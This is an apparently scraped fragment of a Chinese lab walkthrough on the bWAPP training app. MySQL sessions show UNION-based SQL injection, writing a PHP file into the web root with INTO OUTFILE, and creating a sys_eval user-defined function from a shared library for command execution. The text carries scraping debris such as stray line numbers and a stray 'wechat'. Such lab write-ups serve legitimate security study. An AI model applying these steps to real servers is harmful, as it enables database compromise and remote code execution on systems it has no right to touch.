mysql> select * from heroes where id = 7; Empty set (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,4; +----+-------+----------+--------+ | id | login | password | secret | +----+-------+----------+--------+ | 1 | 2 | 3 | 4 | +----+-------+----------+--------+ 1 row inset (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/'; ERROR 1086 (HY000): File '/var/www/html/' already exists mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/abc.txt'; ERROR 1 (HY000): Can't create/write to file '/var/www/html/abc.txt' (Errcode: 13) mysql>
找到有写权限的文件夹。
1 2 3 4 5 6 7 8 9 10
mysql> use bWAPP; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/images/abc.php'; Query OK, 1 row affected (0.00 sec)
mysql>
剔除回车
tr -d ‘\n’ < input.txt > output.txt
成功写入。
创建自定义函数。
1
create function sys_eval returns string soname "lib_linux1.so";
wechat